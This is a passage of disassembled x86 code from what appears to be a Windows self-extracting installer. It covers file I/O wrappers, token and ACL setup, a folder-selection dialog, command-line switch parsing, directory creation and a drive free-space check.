call ds:SetFilePointer ; SetFilePointer
mov eax, esi
pop esi
retn
sub_1002F1B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1002F5A(HANDLE hFile, LPVOID lpBuffer, DWORD NumberOfBytesRead)
sub_1002F5A proc near ; CODE XREF: start_0+178�p
; DATA XREF: start_0+1D5�o
hFile = dword ptr 8
lpBuffer = dword ptr 0Ch
NumberOfBytesRead= dword ptr 10h
push ebp
mov ebp, esp
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push [ebp+NumberOfBytesRead] ; nNumberOfBytesToRead
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hFile] ; hFile
call ds:ReadFile ; ReadFile
test eax, eax
jnz short loc_1002F7D
push 0FFFFFFFFh ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_1002F7D: ; CODE XREF: sub_1002F5A+1A�j
mov eax, [ebp+NumberOfBytesRead]
pop ebp
retn
sub_1002F5A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1002F82(HANDLE hFile, LPCVOID lpBuffer, DWORD NumberOfBytesWritten)
sub_1002F82 proc near ; DATA XREF: start_0+1D0�o
hFile = dword ptr 8
lpBuffer = dword ptr 0Ch
NumberOfBytesWritten= dword ptr 10h
push ebp
mov ebp, esp
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push [ebp+NumberOfBytesWritten] ; nNumberOfBytesToWrite
push [ebp+lpBuffer] ; lpBuffer
push [ebp+hFile] ; hFile
call ds:WriteFile ; WriteFile
test eax, eax
jnz short loc_1002FA5
push 0FFFFFFFFh ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_1002FA5: ; CODE XREF: sub_1002F82+1A�j
mov eax, [ebp+NumberOfBytesWritten]
pop ebp
retn
sub_1002F82 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1002FAA(PSID *TokenHandle, int, int)
sub_1002FAA proc near ; CODE XREF: sub_100369E+66�p
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -0Ch
ReturnLength = dword ptr -4
TokenHandle = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push [ebp+TokenHandle] ; pSid
and [ebp+pIdentifierAuthority.Value], 0
and [ebp+pIdentifierAuthority.Value+1], 0
and [ebp+pIdentifierAuthority.Value+2], 0
and [ebp+pIdentifierAuthority.Value+3], 0
and [ebp+pIdentifierAuthority.Value+4], 0
xor edi, edi
push edi ; nSubAuthority7
push edi ; nSubAuthority6
push edi ; nSubAuthority5
push edi ; nSubAuthority4
push edi ; nSubAuthority3
push edi ; nSubAuthority2
push 220h ; nSubAuthority1
push 20h ; nSubAuthority0
push 2 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
mov [ebp+pIdentifierAuthority.Value+5], 5
call ds:AllocateAndInitializeSid ; AllocateAndInitializeSid
test eax, eax
jz short loc_1003002
lea eax, [ebp+TokenHandle]
push eax ; TokenHandle
push 28h ; DesiredAccess
call ds:GetCurrentProcess ; GetCurrentProcess
push eax ; ProcessHandle
call ds:OpenProcessToken ; OpenProcessToken
test eax, eax
jnz short loc_1003009
loc_1003002: ; CODE XREF: sub_1002FAA+3F�j
xor eax, eax
jmp loc_10030C2
; ---------------------------------------------------------------------------
loc_1003009: ; CODE XREF: sub_1002FAA+56�j
push ebx
mov ebx, ds:GetTokenInformation
push esi
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push 10000h ; TokenInformationLength
push offset pSid ; TokenInformation
push 4 ; TokenInformationClass
push [ebp+TokenHandle] ; TokenHandle
call ebx ; GetTokenInformation
test eax, eax
jnz short loc_1003031
loc_100302A: ; CODE XREF: sub_1002FAA+D4�j
xor eax, eax
jmp loc_10030C0
; ---------------------------------------------------------------------------
loc_1003031: ; CODE XREF: sub_1002FAA+7E�j
push pSid ; pSid
call ds:GetLengthSid ; GetLengthSid
mov esi, eax
push esi ; dwBytes
call sub_1002EFD
cmp eax, edi
pop ecx
mov ecx, [ebp+arg_4]
mov [ecx], eax
jz short loc_100309E
mov ecx, esi
mov esi, pSid
mov edi, eax
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
lea eax, [ebp+ReturnLength]
push eax ; ReturnLength
push 10000h ; TokenInformationLength
push offset pSid ; TokenInformation
and ecx, 3
push 1 ; TokenInformationClass
rep movsb
push [ebp+TokenHandle] ; TokenHandle
call ebx ; GetTokenInformation
test eax, eax
jz short loc_100302A
push pSid ; pSid
call ds:GetLengthSid ; GetLengthSid
mov esi, eax
push esi ; dwBytes
call sub_1002EFD
test eax, eax
pop ecx
mov ecx, [ebp+arg_8]
mov [ecx], eax
jnz short loc_10030A5
loc_100309E: ; CODE XREF: sub_1002FAA+A3�j
push 8 ; dwMessageId
call sub_1002CB9
; ---------------------------------------------------------------------------
loc_10030A5: ; CODE XREF: sub_1002FAA+F2�j
mov ecx, esi
mov esi, pSid
mov edi, eax
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
xor eax, eax
rep movsb
inc eax
loc_10030C0: ; CODE XREF: sub_1002FAA+82�j
pop esi
pop ebx
loc_10030C2: ; CODE XREF: sub_1002FAA+5A�j
pop edi
leave
retn 0Ch
sub_1002FAA endp
; =============== S U B R O U T I N E =======================================
sub_10030C7 proc near ; CODE XREF: DialogFunc+FE�p
; sub_1003272+40�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
lea ecx, [eax+1]
loc_10030CE: ; CODE XREF: sub_10030C7+C�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_10030CE
push esi
sub eax, ecx
lea esi, [eax+1]
push edi
push esi ; dwBytes
call sub_1002EFD
pop ecx
mov ecx, esi
mov esi, [esp+8+arg_0]
mov edx, ecx
shr ecx, 2
mov edi, eax
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
pop edi
pop esi
retn 4
sub_10030C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; BOOL __stdcall DialogFunc(HWND, UINT, WPARAM, LPARAM)
DialogFunc proc near ; DATA XREF: sub_100369E+3A9�o
Buffer = byte ptr -228h
lParam = byte ptr -124h
bi = _browseinfoA ptr -20h
hDlg = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = word ptr 10h
push ebp
mov ebp, esp
sub esp, 228h
mov eax, [ebp+arg_4]
sub eax, 10h
push ebx
push esi
jz loc_100325E
sub eax, 100h
jz loc_1003204
dec eax
jnz short loc_100313A
movzx eax, [ebp+arg_8]
dec eax
jz loc_10031D5
dec eax
jz loc_100325E
sub eax, 6Bh
jz short loc_1003141
loc_100313A: ; CODE XREF: DialogFunc+23�j
xor eax, eax
jmp loc_100326C
; ---------------------------------------------------------------------------
loc_1003141: ; CODE XREF: DialogFunc+3A�j
push edi
push 104h ; nBufferMax
lea eax, [ebp+Buffer]
push eax ; lpBuffer
push 20000005h ; uID
push hInstance ; hInstance
xor ebx, ebx
mov [ebp+lParam], bl
call ds:LoadStringA ; LoadStringA
mov esi, [ebp+hDlg]
push 8
xor eax, eax
pop ecx
lea edi, [ebp+bi]
rep stosd
lea eax, [ebp+lParam]
mov [ebp+bi.pszDisplayName], eax
lea eax, [ebp+Buffer]
mov [ebp+bi.lpszTitle], eax
xor edi, edi
lea eax, [ebp+bi]
inc edi
push eax ; lpbi
mov [ebp+bi.hwndOwner], esi
mov [ebp+bi.ulFlags], edi
call ds:SHBrowseForFolderA ; SHBrowseForFolderA
cmp eax, ebx
jz short loc_10031C2
lea ecx, [ebp+lParam]
push ecx ; pszPath
push eax ; pidl
call ds:SHGetPathFromIDListA ; SHGetPathFromIDListA
test eax, eax
jz short loc_10031C2
lea eax, [ebp+lParam]
push eax ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 6Ch ; nIDDlgItem
push esi ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
loc_10031C2: ; CODE XREF: DialogFunc+9D�j
; DialogFunc+AF�j
push ebx ; lParam
push ebx ; wParam
push 28h ; Msg
push esi ; hWnd
call ds:SendMessageA ; SendMessageA
mov eax, edi
pop edi
jmp loc_100326C
; ---------------------------------------------------------------------------
loc_10031D5: ; CODE XREF: DialogFunc+2A�j
and [ebp+lParam], 0
lea eax, [ebp+lParam]
push eax ; lParam
push 104h ; wParam
push 0Dh ; Msg
push 6Ch ; nIDDlgItem
push [ebp+hDlg] ; hDlg
call ds:SendDlgItemMessageA ; SendDlgItemMessageA
lea eax, [ebp+lParam]
push eax
call sub_10030C7
push eax
jmp short loc_1003260
; ---------------------------------------------------------------------------
loc_1003204: ; CODE XREF: DialogFunc+1C�j
push 104h ; nBufferMax
lea eax, [ebp+lParam]
push eax ; lpBuffer
push 20000005h ; uID
push hInstance ; hInstance
call ds:LoadStringA ; LoadStringA
lea eax, [ebp+lParam]
push eax ; lParam
xor ebx, ebx
push ebx ; wParam
push 0Ch ; Msg
push [ebp+hDlg] ; hWnd
call ds:SendMessageA ; SendMessageA
mov esi, ds:SendDlgItemMessageA
lea eax, [ebp+lParam]
push eax ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 67h ; nIDDlgItem
push [ebp+hDlg] ; hDlg
call esi ; SendDlgItemMessageA
push offset Buffer ; lParam
push ebx ; wParam
push 0Ch ; Msg
push 6Ch ; nIDDlgItem
push [ebp+hDlg] ; hDlg
call esi ; SendDlgItemMessageA
jmp short loc_1003269
; ---------------------------------------------------------------------------
loc_100325E: ; CODE XREF: DialogFunc+11�j
; DialogFunc+31�j
push 0 ; nResult
loc_1003260: ; CODE XREF: DialogFunc+104�j
push [ebp+hDlg] ; hDlg
call ds:EndDialog ; EndDialog
loc_1003269: ; CODE XREF: DialogFunc+15E�j
xor eax, eax
inc eax
loc_100326C: ; CODE XREF: DialogFunc+3E�j
; DialogFunc+D2�j
pop esi
pop ebx
leave
retn 10h
DialogFunc endp
; =============== S U B R O U T I N E =======================================
sub_1003272 proc near ; CODE XREF: start_0+46�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
sub esp, 10h
push ebx
push ebp
push esi
push edi
push 104h ; nSize
mov esi, offset NumberOfBytesRead
push esi ; lpFilename
xor ebx, ebx
push ebx ; hModule
call ds:GetModuleFileNameA ; GetModuleFileNameA
mov eax, esi
lea ecx, [eax+1]
loc_1003292: ; CODE XREF: sub_1003272+25�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_1003292
sub eax, ecx
lea eax, NumberOfBytesRead[eax]
jmp short loc_10032AD
; ---------------------------------------------------------------------------
loc_10032A3: ; CODE XREF: sub_1003272+3D�j
lea ecx, [eax-1]
cmp byte ptr [ecx], 5Ch
jz short loc_10032B1
mov eax, ecx
loc_10032AD: ; CODE XREF: sub_1003272+2F�j
cmp eax, esi
ja short loc_10032A3
loc_10032B1: ; CODE XREF: sub_1003272+37�j
push eax
call sub_10030C7
push esi ; NumberOfBytesRead
mov lParam, eax
call sub_100280D
call ds:GetCommandLineA ; GetCommandLineA
mov ebp, eax
mov [esp+20h+var_8], ebp
xor ecx, ecx
loc_10032D0: ; CODE XREF: sub_1003272+75�j
mov al, [ebp+0]
cmp al, 20h
jz short loc_10032DF
cmp al, 9
jz short loc_10032DF
cmp al, 22h
jnz short loc_10032E9
loc_10032DF: ; CODE XREF: sub_1003272+63�j
; sub_1003272+67�j
cmp al, 22h
jnz short loc_10032E6
xor ecx, ecx
inc ecx
loc_10032E6: ; CODE XREF: sub_1003272+6F�j
inc ebp
jmp short loc_10032D0
; ---------------------------------------------------------------------------
loc_10032E9: ; CODE XREF: sub_1003272+6B�j
cmp ecx, ebx
mov [esp+20h+var_8], ebp
jz short loc_1003307
cmp [ebp+0], bl
mov eax, ebp
jz short loc_1003307
loc_10032F8: ; CODE XREF: sub_1003272+8E�j
cmp byte ptr [eax], 22h
jz short loc_1003304
inc eax
cmp [eax], bl
jnz short loc_10032F8
jmp short loc_1003307
; ---------------------------------------------------------------------------
loc_1003304: ; CODE XREF: sub_1003272+89�j
mov byte ptr [eax], 20h
loc_1003307: ; CODE XREF: sub_1003272+7D�j
; sub_1003272+84�j ...
mov eax, ebp
lea ecx, [eax+1]
loc_100330C: ; CODE XREF: sub_1003272+9F�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_100330C
sub eax, ecx
lea eax, [eax+ebp-1]
jmp short loc_100332A
; ---------------------------------------------------------------------------
loc_100331B: ; CODE XREF: sub_1003272+BA�j
mov cl, [eax]
cmp cl, 20h
jz short loc_1003327
cmp cl, 9
jnz short loc_100332E
loc_1003327: ; CODE XREF: sub_1003272+AE�j
mov [eax], bl
dec eax
loc_100332A: ; CODE XREF: sub_1003272+A7�j
cmp eax, ebp
jnb short loc_100331B
loc_100332E: ; CODE XREF: sub_1003272+B3�j
mov ecx, lParam
mov eax, ecx
mov [esp+20h+var_10], ebx
mov byte ptr Caption, bl
lea esi, [eax+1]
loc_1003343: ; CODE XREF: sub_1003272+D6�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_1003343
sub eax, esi
lea edx, [eax+ecx-1]
jmp short loc_1003358
; ---------------------------------------------------------------------------
loc_1003352: ; CODE XREF: sub_1003272+E8�j
cmp byte ptr [edx], 2Eh
jz short loc_100335E
dec edx
loc_1003358: ; CODE XREF: sub_1003272+DE�j
cmp edx, ecx
ja short loc_1003352
jmp short loc_1003390
; ---------------------------------------------------------------------------
loc_100335E: ; CODE XREF: sub_1003272+E3�j
mov eax, edx
lea esi, [eax+1]
loc_1003363: ; CODE XREF: sub_1003272+F6�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_1003363
sub eax, esi
lea ecx, [eax+1]
mov [esp+20h+var_10], eax
mov eax, ecx
shr ecx, 2
mov esi, edx
mov edi, offset Caption
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov [edx], bl
mov ecx, lParam
loc_1003390: ; CODE XREF: sub_1003272+EA�j
mov dword_100802C, offset dword_100219C
cmp [ebp+0], bl
mov esi, ebp
jmp loc_10034A7
; ---------------------------------------------------------------------------
loc_10033A4: ; CODE XREF: sub_1003272+239�j
mov al, [esi]
mov dl, [ecx]
or al, 20h
or dl, 20h
cmp al, dl
jnz loc_10034A0
lea ebp, [esi+1]
lea esi, [ecx+1]
jmp short loc_10033C5
; ---------------------------------------------------------------------------
loc_10033BD: ; CODE XREF: sub_1003272+162�j
xor ebx, ebx
cmp al, bl
jz short loc_10033E0
inc ebp
inc esi
loc_10033C5: ; CODE XREF: sub_1003272+149�j
mov al, [esi]
mov dl, [ebp+0]
mov bl, al
or dl, 20h
or bl, 20h
cmp bl, dl
jz short loc_10033BD
xor ebx, ebx
cmp al, bl
jnz loc_10034A0
loc_10033E0: ; CODE XREF: sub_1003272+14F�j
cmp byte ptr [ebp+0], 2Eh
mov [esp+20h+var_C], ebx
jnz short loc_100342D
cmp [esp+20h+var_10], ebx
jbe short loc_100342D
xor edi, edi
cmp [esp+20h+var_10], ebx
mov [esp+20h+var_C], 1
jbe short loc_1003429
mov eax, ebp
sub eax, offset Caption
loc_1003407: ; CODE XREF: sub_1003272+1B3�j
lea esi, Caption[edi]
mov dl, [eax+esi]
mov bl, [esi]
or dl, 20h
or bl, 20h
cmp dl, bl
jnz loc_10034B3
inc edi
cmp edi, [esp+20h+var_10]
jb short loc_1003407
xor ebx, ebx
loc_1003429: ; CODE XREF: sub_1003272+18C�j
add ebp, [esp+20h+var_10]
loc_100342D: ; CODE XREF: sub_1003272+176�j
; sub_1003272+17C�j ...
mov al, [ebp+0]
cmp al, 20h
jz short loc_100343C
cmp al, 9
jz short loc_100343C
cmp al, bl
jnz short loc_10034A0
loc_100343C: ; CODE XREF: sub_1003272+1C0�j
; sub_1003272+1C4�j
mov esi, [esp+20h+var_8]
mov eax, ebp
sub eax, esi
mov ecx, eax
mov ebx, ecx
shr ecx, 2
mov edx, offset FileName
mov edi, edx
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
xor ebx, ebx
cmp [esp+20h+var_C], ebx
lea edi, FileName[eax]
mov [edi], bl
jnz short loc_100348F
mov ecx, [esp+20h+var_10]
mov ebx, ecx
shr ecx, 2
mov esi, offset Caption
rep movsd
mov ecx, ebx
and ecx, 3
rep movsb
mov ecx, [esp+20h+var_10]
xor ebx, ebx
mov byte ptr FileName[eax+ecx], bl
loc_100348F: ; CODE XREF: sub_1003272+1F7�j
push edx ; lpFileName
call ds:GetFileAttributesA ; GetFileAttributesA
test al, 10h
jz short loc_10034BE
mov ecx, lParam
loc_10034A0: ; CODE XREF: sub_1003272+13D�j
; sub_1003272+168�j ...
mov esi, [esp+20h+var_4]
inc esi
cmp [esi], bl
loc_10034A7: ; CODE XREF: sub_1003272+12D�j
mov [esp+20h+var_4], esi
jnz loc_10033A4
jmp short loc_10034C4
; ---------------------------------------------------------------------------
loc_10034B3: ; CODE XREF: sub_1003272+1A8�j
xor ebx, ebx
mov [esp+20h+var_C], ebx
jmp loc_100342D
; ---------------------------------------------------------------------------
loc_10034BE: ; CODE XREF: sub_1003272+226�j
mov dword_100802C, ebp
loc_10034C4: ; CODE XREF: sub_1003272+23F�j
mov ebp, dword_100802C
mov eax, ebp
lea edx, [eax+1]
loc_10034CF: ; CODE XREF: sub_1003272+262�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_10034CF
sub eax, edx
cmp eax, 3
jb loc_1003561
lea edi, [eax-2]
jmp short loc_100355D
; ---------------------------------------------------------------------------
loc_10034E6: ; CODE XREF: sub_1003272+2ED�j
mov esi, [ebp+0]
and esi, 0FFDFFDFFh
xor eax, eax
or esi, 20000000h
inc eax
cmp esi, 20582D20h
jnz short loc_1003505
mov dword_1008030, eax
loc_1003505: ; CODE XREF: sub_1003272+28C�j
cmp esi, 3A582D20h
jnz short loc_1003522
mov dword_1008030, eax
lea eax, [ebp+4]
push eax
call sub_1002746
test eax, eax
jz short loc_1003569
xor eax, eax
inc eax
loc_1003522: ; CODE XREF: sub_1003272+299�j
cmp esi, 20552D20h
jnz short loc_100352F
mov dword_1018C20, eax
loc_100352F: ; CODE XREF: sub_1003272+2B6�j
cmp esi, 20512D20h
jnz short loc_1003541
mov dword_1008038, eax
mov dword_1018C20, eax
loc_1003541: ; CODE XREF: sub_1003272+2C3�j
cmp esi, 20532D20h
jnz short loc_100354E
mov dword_1008768, eax
loc_100354E: ; CODE XREF: sub_1003272+2D5�j
cmp esi, 3A532D20h
jnz short loc_100355B
mov dword_1008768, eax
loc_100355B: ; CODE XREF: sub_1003272+2E2�j
dec edi
inc ebp
loc_100355D: ; CODE XREF: sub_1003272+272�j
cmp edi, ebx
ja short loc_10034E6
loc_1003561: ; CODE XREF: sub_1003272+269�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 10h
retn
; ---------------------------------------------------------------------------
loc_1003569: ; CODE XREF: sub_1003272+2AB�j
push 52h ; dwMessageId
call sub_1002CB9
sub_1003272 endp
; ---------------------------------------------------------------------------
db 0CCh
; =============== S U B R O U T I N E =======================================
sub_1003571 proc near ; CODE XREF: sub_1003596+36�p
; sub_1003AE1+1CE�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push 8 ; dwBytes
call sub_1002EFD
pop ecx
push [esp+4+arg_4]
mov esi, eax
call sub_10030C7
mov [esi+4], eax
mov eax, [esp+4+arg_0]
mov ecx, [eax]
mov [esi], ecx
mov [eax], esi
pop esi
retn 8
sub_1003571 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_1003596(LPCSTR lpPathName, LPSECURITY_ATTRIBUTES lpSecurityAttributes, int)
sub_1003596 proc near ; CODE XREF: sub_10035EA+56�p
; sub_1003AE1+19D�p
lpPathName = dword ptr 8
lpSecurityAttributes= dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
xor eax, eax
cmp [ebp+arg_8], eax
push esi
setz al
push edi
mov edi, [ebp+lpPathName]
cmp byte ptr [edi], 0
mov esi, edi
mov [ebp+lpPathName], eax
jz short loc_10035E1
loc_10035B0: ; CODE XREF: sub_1003596+49�j
cmp byte ptr [esi], 5Ch
jnz short loc_10035DB
push [ebp+lpSecurityAttributes] ; lpSecurityAttributes
and byte ptr [esi], 0
push edi ; lpPathName
call ds:CreateDirectoryA ; CreateDirectoryA
test eax, eax
jz short loc_10035D8
push edi
push offset off_1008008
call sub_1003571
mov [ebp+lpPathName], 1
loc_10035D8: ; CODE XREF: sub_1003596+2E�j
mov byte ptr [esi], 5Ch
loc_10035DB: ; CODE XREF: sub_1003596+1D�j
inc esi
cmp byte ptr [esi], 0
jnz short loc_10035B0
loc_10035E1: ; CODE XREF: sub_1003596+18�j
mov eax, [ebp+lpPathName]
pop edi
pop esi
pop ebp
retn 0Ch
sub_1003596 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10035EA(int, LPSECURITY_ATTRIBUTES lpSecurityAttributes, int)
sub_10035EA proc near ; CODE XREF: sub_100369E+47�p
; sub_100369E+2DD�p ...
PathName = byte ptr -104h
arg_0 = dword ptr 8
lpSecurityAttributes= dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 104h
push esi
mov esi, [ebp+arg_0]
mov eax, esi
push edi
lea edx, [eax+1]
loc_10035FD: ; CODE XREF: sub_10035EA+18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_10035FD
sub eax, edx
lea ecx, [eax+1]
mov edx, ecx
shr ecx, 2
lea edi, [ebp+PathName]
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
lea eax, [ebp+eax+PathName]
cmp byte ptr [eax-1], 5Ch
pop edi
pop esi
jz short loc_1003633
mov byte ptr [eax], 5Ch
and byte ptr [eax+1], 0
loc_1003633: ; CODE XREF: sub_10035EA+40�j
push [ebp+arg_8] ; int
lea eax, [ebp+PathName]
push [ebp+lpSecurityAttributes] ; lpSecurityAttributes
push eax ; lpPathName
call sub_1003596
test eax, eax
jz short loc_1003698
lea eax, [ebp+PathName]
push eax ; lpFileName
call ds:GetFileAttributesA ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_1003698
test al, 10h
jz short loc_1003698
push offset LibFileName ; "advapi32.dll"
call ds:LoadLibraryA ; LoadLibraryA
test eax, eax
jz short loc_1003693
push offset aDecryptfilea ; "DecryptFileA"
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
test eax, eax
jz short loc_1003693
push 0
lea ecx, [ebp+PathName]
push ecx
call eax
test eax, eax
jnz short loc_1003693
call ds:GetLastError
loc_1003693: ; CODE XREF: sub_10035EA+82�j
; sub_10035EA+92�j ...
xor eax, eax
inc eax
jmp short locret_100369A
; ---------------------------------------------------------------------------
loc_1003698: ; CODE XREF: sub_10035EA+5D�j
; sub_10035EA+6F�j ...
xor eax, eax
locret_100369A: ; CODE XREF: sub_10035EA+AC�j
leave
retn 0Ch
sub_10035EA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=78h
sub_100369E proc near ; CODE XREF: start_0:loc_1003EFC�p
TargetPath = byte ptr -59Ch
pAcl = ACL ptr -19Ch
pbBuffer = byte ptr -9Ch
SystemTime = _SYSTEMTIME ptr -7Ch
pSecurityDescriptor= byte ptr -6Ch
TotalNumberOfClusters= dword ptr -58h
FileTime = _FILETIME ptr -54h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
TokenHandle = dword ptr -40h
NumberOfFreeClusters= dword ptr -3Ch
SectorsPerCluster= dword ptr -38h
BytesPerSector = dword ptr -34h
hProv = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
lpSecurityAttributes= dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
DeviceName = byte ptr -10h
var_9 = byte ptr -9
RootPathName = byte ptr -8
var_1 = byte ptr -1
push ebp
lea ebp, [esp-78h]
sub esp, 59Ch
push ebx
push edi
xor edi, edi
cmp byte ptr Buffer, 0
lea eax, [ebp+78h+pSecurityDescriptor]
mov dword ptr [ebp+78h+RootPathName], 5C3A63h
mov [ebp+78h+var_1], 63h
mov [ebp+78h+var_1C], edi
mov [ebp+78h+var_18], edi
mov [ebp+78h+var_14], edi
mov [ebp+78h+var_4C], 0Ch
mov [ebp+78h+var_48], eax
mov [ebp+78h+var_44], edi
mov [ebp+78h+lpSecurityAttributes], edi
mov ebx, offset Buffer
jz short loc_10036F8
push edi ; int
push edi ; lpSecurityAttributes
push ebx ; int
call sub_10035EA
test eax, eax
jnz loc_1003ADA
and byte ptr Buffer, al
loc_10036F8: ; CODE XREF: sub_100369E+42�j
lea eax, [ebp+78h+DeviceName]
push eax ; int
lea eax, [ebp+78h+var_24]
push eax ; int
lea eax, [ebp+78h+TokenHandle]
push eax ; TokenHandle
call sub_1002FAA
test eax, eax
jnz short loc_1003714
loc_100370D: ; CODE XREF: sub_100369E+3C5�j
push 0FFFFFFFFh
jmp loc_1003AD4
; ---------------------------------------------------------------------------
loc_1003714: ; CODE XREF: sub_100369E+6D�j
push esi
push 1 ; dwRevision
lea eax, [ebp+78h+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call ds:InitializeSecurityDescriptor ; InitializeSecurityDescriptor
test eax, eax
jz short loc_10037A2
push 2 ; dwAclRevision
push 100h ; nAclLength
lea eax, [ebp+78h+pAcl]
push eax ; pAcl
call ds:InitializeAcl ; InitializeAcl
test eax, eax
jz short loc_10037A2
push [ebp+78h+TokenHandle] ; pSid
mov esi, ds:AddAccessAllowedAce
mov edi, 10000000h
push edi ; AccessMask
push 2 ; dwAceRevision
lea eax, [ebp+78h+pAcl]
push eax ; pAcl
call esi ; AddAccessAllowedAce
test eax, eax
jz short loc_10037A0
push [ebp+78h+var_24] ; pSid
lea eax, [ebp+78h+pAcl]
push edi ; AccessMask
push 2 ; dwAceRevision
push eax ; pAcl
call esi ; AddAccessAllowedAce
test eax, eax
jz short loc_10037A0
push dword ptr [ebp+78h+DeviceName] ; pSid
lea eax, [ebp+78h+pAcl]
push edi ; AccessMask
push 2 ; dwAceRevision
push eax ; pAcl
call esi ; AddAccessAllowedAce
test eax, eax
jz short loc_10037A0
push 0 ; bDaclDefaulted
lea eax, [ebp+78h+pAcl]
push eax ; pDacl
push 1 ; bDaclPresent
lea eax, [ebp+78h+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call ds:SetSecurityDescriptorDacl ; SetSecurityDescriptorDacl
test eax, eax
jz short loc_10037A0
lea eax, [ebp+78h+var_4C]
mov [ebp+78h+lpSecurityAttributes], eax
loc_10037A0: ; CODE XREF: sub_100369E+BB�j
; sub_100369E+CE�j ...
xor edi, edi
loc_10037A2: ; CODE XREF: sub_100369E+85�j
; sub_100369E+9D�j
cmp dword_1018C20, edi
jnz short loc_10037C3
cmp dword_1008030, edi
jz short loc_10037C3
loc_10037B2: ; CODE XREF: sub_100369E+376�j
push ebx ; lpBuffer
push 104h ; nBufferLength
call ds:GetCurrentDirectoryA ; GetCurrentDirectoryA
jmp loc_1003A1C
; ---------------------------------------------------------------------------
loc_10037C3: ; CODE XREF: sub_100369E+10A�j
; sub_100369E+112�j
push 0FFFFh ; uSize
push offset pSid ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
mov al, byte ptr pSid
or al, 20h
mov [ebp+78h+var_9], al
mov [ebp+78h+var_2C], edi
mov [ebp+78h+var_28], edi
mov [ebp+78h+RootPathName], 61h
loc_10037E7: ; CODE XREF: sub_100369E+206�j
lea eax, [ebp+78h+RootPathName]
push eax ; lpRootPathName
call ds:GetDriveTypeA ; GetDriveTypeA
mov esi, eax
push 2 ; size_t
lea eax, [ebp+78h+RootPathName]
push eax ; char *
lea eax, [ebp+78h+DeviceName]
push eax ; char *
call ds:strncpy ; strncpy
and [ebp+78h+DeviceName+2], 0
add esp, 0Ch
push 400h ; ucchMax
lea eax, [ebp+78h+TargetPath]
push eax ; lpTargetPath
lea eax, [ebp+78h+DeviceName]
push eax ; lpDeviceName
call ds:QueryDosDeviceA ; QueryDosDeviceA
cmp esi, 3
jz short loc_100382A
cmp esi, 6
jnz short loc_100389D
loc_100382A: ; CODE XREF: sub_100369E+185�j
cmp eax, edi
jz short loc_100389D
lea eax, [ebp+78h+TargetPath]
push offset aBackofficestor ; "backofficestorage"
push eax ; char *
call ds:_strlwr ; _strlwr
pop ecx
push eax ; char *
call ds:strstr ; strstr
test eax, eax
pop ecx
pop ecx
jnz short loc_100389D
lea eax, [ebp+78h+TotalNumberOfClusters]
push eax ; lpTotalNumberOfClusters
lea eax, [ebp+78h+NumberOfFreeClusters]
push eax ; lpNumberOfFreeClusters
lea eax, [ebp+78h+BytesPerSector]
push eax ; lpBytesPerSector
lea eax, [ebp+78h+SectorsPerCluster]
push eax ; lpSectorsPerCluster
lea eax, [ebp+78h+RootPathName]
push eax ; lpRootPathName
call ds:GetDiskFreeSpaceA ; GetDiskFreeSpaceA
test eax, eax
jz short loc_100389D
mov eax, [ebp+78h+SectorsPerCluster]
imul eax, [ebp+78h+BytesPerSector]
mul [ebp+78h+NumberOfFreeClusters]
mov cl, [ebp+78h+RootPathName]
cmp cl, [ebp+78h+var_9]
mov esi, edx
jnz short loc_1003888
mov [ebp+78h+var_2C], eax
mov [ebp+78h+var_28], esi
jmp short loc_100389D
